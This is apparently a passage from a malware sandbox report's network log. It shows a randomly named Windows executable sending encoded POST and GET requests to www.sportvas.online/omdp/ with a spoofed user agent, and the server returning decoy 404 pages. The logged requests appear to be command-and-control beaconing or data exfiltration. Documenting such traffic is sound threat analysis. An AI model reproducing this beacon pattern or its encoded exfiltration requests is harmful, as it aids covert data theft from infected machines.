                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 4b 63 6b 4f 2f 31 55 74 31 43 54 6c 37 32 70 4e 71 38 34 4e 70 7a 39 42 62 4c 66 66 67 79 59 2f 51 74 38 77 77 63 63 4a 7a 62 38 6a 4b 4c 58 35 6d 36 42 73 6e 48 65 61 44 53 4a 4d 4f 6b 56 43 72 45 37 39 39 4b 36 6a 5a 43 61 4f 45 6a 4a 62 48 36 72 41 59 62 6f 4f 79 44 4f 7a 50 42 47 6c 6f 4e 55 33 53 50 7a 5a 65 4c 2b 45 32 4b 59 68 41 59 49 2f 44 51 36 31 6b 49 6f 34 66 38 34 6f 4f 2f 6a 31 2b 45 38 48 65 6a 75 4f 38 2b 43 39 75 51 45 44 4c 43 59 35 56 2b 52 72 64 63 6a 4d 51 6a 43 62 72 33 4c 6a 34 67 50 31 47 4f 30 73 6c 73 41 66 4d 46 7a 74 39 78 50 71 41 71 45 56 66 33 2b 4d 56 4e 6a 65 4e 4e 55 66 2b 75 6f 35 63 41 3d 3d
                                                                                                      Data Ascii: tHv=KckO/1Ut1CTl72pNq84Npz9BbLffgyY/Qt8wwccJzb8jKLX5m6BsnHeaDSJMOkVCrE799K6jZCaOEjJbH6rAYboOyDOzPBGloNU3SPzZeL+E2KYhAYI/DQ61kIo4f84oO/j1+E8HejuO8+C9uQEDLCY5V+RrdcjMQjCbr3Lj4gP1GO0slsAfMFzt9xPqAqEVf3+MVNjeNNUf+uo5cA==
                                                                                                      Nov 26, 2024 09:50:47.836882114 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 26 Nov 2024 08:50:47 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 13840
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                                      Nov 26, 2024 09:50:47.836981058 CET1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                                                                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                                                                      Nov 26, 2024 09:50:47.836997032 CET1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                                                                      Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                                                                      Nov 26, 2024 09:50:47.837009907 CET1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                                                                      Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                                                                      Nov 26, 2024 09:50:47.837024927 CET896INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                                                                                      Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                                                                      Nov 26, 2024 09:50:47.837038994 CET1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                                                                                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                                                                                      Nov 26, 2024 09:50:47.837091923 CET1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                                                                                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                                                                                      Nov 26, 2024 09:50:47.837114096 CET448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                                                                                      Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                                                                                      Nov 26, 2024 09:50:47.837166071 CET1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                                                                                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                                                                                                      Nov 26, 2024 09:50:47.837176085 CET224INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                                                                                                      Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.43
                                                                                                      Nov 26, 2024 09:50:47.957696915 CET1236INData Raw: 37 2d 2e 34 37 38 2d 2e 30 36 34 2d 31 2e 33 30 35 2d 2e 33 37 2d 31 2e 36 39 4d 31 31 37 2e 37 31 20 31 33 2e 31 38 34 63 2d 2e 32 38 32 2e 32 37 36 2d 2e 35 35 38 2e 35 35 35 2d 2e 38 35 32 2e 38 31 35 2d 2e 31 34 33 2e 31 32 36 2d 2e 33 33 33
                                                                                                      Data Ascii: 7-.478-.064-1.305-.37-1.69M117.71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.318-.086.446-.134.16-.062.324-.11.486-.169.51-.186.872-.578 1.145-1.11.418-.816-.553-1


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.949927184.94.215.26803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:49.189359903 CET1831OUTPOST /omdp/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.sportvas.online
                                                                                                      Origin: http://www.sportvas.online
                                                                                                      Referer: http://www.sportvas.online/omdp/
                                                                                                      Content-Length: 1228
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 4b 63 6b 4f 2f 31 55 74 31 43 54 6c 37 32 70 4e 71 38 34 4e 70 7a 39 42 62 4c 66 66 67 79 59 2f 51 74 38 77 77 63 63 4a 7a 62 30 6a 4b 59 66 35 6b 5a 5a 73 6d 48 65 61 43 53 4a 50 4f 6b 56 36 72 45 79 32 39 4b 32 7a 5a 41 69 4f 56 77 78 62 42 4c 72 41 42 72 6f 4f 37 6a 4f 79 41 68 48 74 6f 4c 30 7a 53 50 6a 5a 65 4c 2b 45 32 49 77 68 47 4e 6f 2f 42 51 36 32 79 59 6f 2f 62 38 35 33 4f 2f 37 6c 2b 45 78 6c 65 54 4f 4f 39 61 69 39 6a 45 6b 44 47 43 59 37 46 75 52 7a 64 63 2b 4d 51 6e 69 58 72 32 2f 5a 34 6a 66 31 45 36 4e 51 30 59 49 63 64 47 65 59 2f 43 33 36 50 2b 4a 32 52 6e 65 4b 45 6f 76 67 65 65 6c 76 30 4f 78 39 48 75 59 43 6c 49 6f 30 34 69 31 50 68 54 4f 32 35 50 75 72 72 4d 4a 32 75 48 69 2f 6f 51 6f 32 6a 30 4d 6b 70 35 79 35 79 74 6d 63 4e 35 71 2b 6e 76 39 34 54 52 6d 44 34 48 67 67 49 74 63 69 68 51 57 4a 62 69 65 6f 72 45 48 7a 4d 49 2b 79 51 6a 4f 50 4b 35 6d 59 5a 6c 55 35 72 37 61 42 63 62 52 47 74 2f 5a 73 50 74 77 6f 44 61 51 57 31 75 5a 30 5a 38 49 51 73 44 63 34 67 4d [TRUNCATED]
                                                                                                      Data Ascii: tHv=KckO/1Ut1CTl72pNq84Npz9BbLffgyY/Qt8wwccJzb0jKYf5kZZsmHeaCSJPOkV6rEy29K2zZAiOVwxbBLrABroO7jOyAhHtoL0zSPjZeL+E2IwhGNo/BQ62yYo/b853O/7l+ExleTOO9ai9jEkDGCY7FuRzdc+MQniXr2/Z4jf1E6NQ0YIcdGeY/C36P+J2RneKEovgeelv0Ox9HuYClIo04i1PhTO25PurrMJ2uHi/oQo2j0Mkp5y5ytmcN5q+nv94TRmD4HggItcihQWJbieorEHzMI+yQjOPK5mYZlU5r7aBcbRGt/ZsPtwoDaQW1uZ0Z8IQsDc4gMVGcZtrqh+78dGXj7FEuRNiXguBlx5PpY08YWcATW7KEOlasxbJ+JxvVCRRase0ts3e6fddPwkSMsXQXc3vTtNjR2MDETaUQ5aiWWU7REkdLomQkaJNHzB6D30PNYBMkgfXAD+P2A8uNGHZuuD9ZFGM4lpKd61BHc90nSkKpZMZLOHdj1WucVfMvB0p9gfk+Qmcug7mQyry9xR0c9nisTUKAyY5+ruO11aXiwjCWgHH/IxgLe5cpY4IvxFYBX/yE43vka3G+4BdeM8kcoBYs3/ThS9PP0xHtP5TVWkkAETD72vq1iOjB7z2H75c4zBd7XxuKqlS/wMIFXcvVKeP+nff6bBRXNa7P71ew8IiJHPNX2CLhMRzqADT1GhDAQpaLJK8ppGE0fIGO6uzoWujjFBHONIKbLYg5tRY3yMjr9G+vy2eJ0Q4HOWEEh86SYR/p1vie9WDtTZtTUZSYdg4A0OA6pH6H4+qVOhXExFaZjReIcWxhZdjRYZ8kTfoTRwoagzDw4H+/U7hX4ZEmJip7Tzj9NQAIb4sG33ZVCkPdf9gZR/U1wIIw6D8Qg27gxqxjrO0rxLuooWdZ0opURTvOmVM6bjQ3EBTNPCKFQ39Zjjz8AhXyiuwkfplOMitJlf77pBsvzBpkKzY0B6LgV/Y7B+ru019LUX9tf6G [TRUNCATED]
                                                                                                      Nov 26, 2024 09:50:50.452837944 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 26 Nov 2024 08:50:50 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 13840
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                                      Nov 26, 2024 09:50:50.452862978 CET1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                                                                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                                                                      Nov 26, 2024 09:50:50.452877045 CET1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                                                                      Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                                                                      Nov 26, 2024 09:50:50.452888966 CET1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                                                                      Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                                                                      Nov 26, 2024 09:50:50.452899933 CET896INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                                                                                      Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                                                                      Nov 26, 2024 09:50:50.452913046 CET1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                                                                                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                                                                                      Nov 26, 2024 09:50:50.452925920 CET1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                                                                                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                                                                                      Nov 26, 2024 09:50:50.452936888 CET448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                                                                                      Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                                                                                      Nov 26, 2024 09:50:50.453007936 CET1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                                                                                                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                                                                                                      Nov 26, 2024 09:50:50.453083038 CET1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                                                                                                      Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.
                                                                                                      Nov 26, 2024 09:50:50.573033094 CET1236INData Raw: 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d 2e 31 38 36 2d 2e 31 33 37 2d 2e 33 32 39 2d
                                                                                                      Data Ascii: 4-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translate(161 68)"/>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.949934184.94.215.26803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:51.843170881 CET527OUTGET /omdp/?ozM=pHXpHpbXjHh&tHv=HeMu8D5S7ALw33d30qwp+iVrSIOapV1+fOAS6dt6/K50LaCJgK98+ja3O2AONA8l3lWptpqiQiqaFmpVL4TMP9Av2zmNEjnairAXee7lUtaK+ZtXcQ== HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Host: www.sportvas.online
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Nov 26, 2024 09:50:53.107072115 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 26 Nov 2024 08:50:52 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 13840
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
